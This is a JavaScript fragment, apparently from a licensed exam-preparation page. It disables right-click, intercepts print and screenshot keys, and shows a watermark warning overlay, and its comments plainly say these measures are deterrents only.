nameInput.addEventListener('keypress', e => { if (e.key === 'Enter') tryNameConfirm(); });
nameInput.addEventListener('input', () => nameError.classList.remove('show'));
// Tier 1 — disable right-click after gate passes (deterrent only: DevTools and view-source are unaffected)
document.addEventListener('contextmenu', e => {
if (!document.getElementById('screen-gate').classList.contains('active')) e.preventDefault();
});
// Tier 1 — screenshot/print key deterrent. Only the print shortcut can actually be blocked;
// PrintScreen and the macOS capture chords are handled by the OS, so at most the page sees the
// keydown and shows the notice. The per-user watermark, not this handler, is the real control.
document.addEventListener('keydown', e => {
if (document.getElementById('screen-gate').classList.contains('active')) return;
const isPrint = (e.ctrlKey || e.metaKey) && e.key.toLowerCase() === 'p'; // Ctrl+P, Cmd+P, Shift variants
const isScreenshot = e.key === 'PrintScreen' ||
(e.metaKey && e.shiftKey && ['3','4','5'].includes(e.key)) ||
isPrint;
if (isScreenshot){
showScreenshotWarning();
if (isPrint) e.preventDefault();
}
});
function showScreenshotWarning(){
if (document.getElementById('ssWarning')) return;
const overlay = document.createElement('div');
overlay.id = 'ssWarning';
overlay.style.cssText = 'position:fixed;top:0;left:0;right:0;bottom:0;z-index:9999;'+
'background:rgba(255,255,255,0.97);display:flex;align-items:center;'+
'justify-content:center;font-family:Cinzel,serif;text-align:center;padding:40px;';
// Inner markup reconstructed (its tags were lost in extraction); the notice wording is the page's own.
// The dismiss button and the appendChild call are assumed, since the original is cut off after the text.
overlay.innerHTML = '<div style="max-width:560px;">' +
'<h2 style="margin:0 0 16px;">Licensed Content Notice</h2>' +
'<p style="line-height:1.6;">Every screen you see is watermarked with your name. ' +
'Screenshots or recordings shared outside your own preparation use violate your license and are traceable to you.</p>' +
'<button type="button" id="ssDismiss" style="margin-top:24px;padding:10px 24px;">Return to the exam</button>' +
'</div>';
document.body.appendChild(overlay);
document.getElementById('ssDismiss').addEventListener('click', () => overlay.remove());
}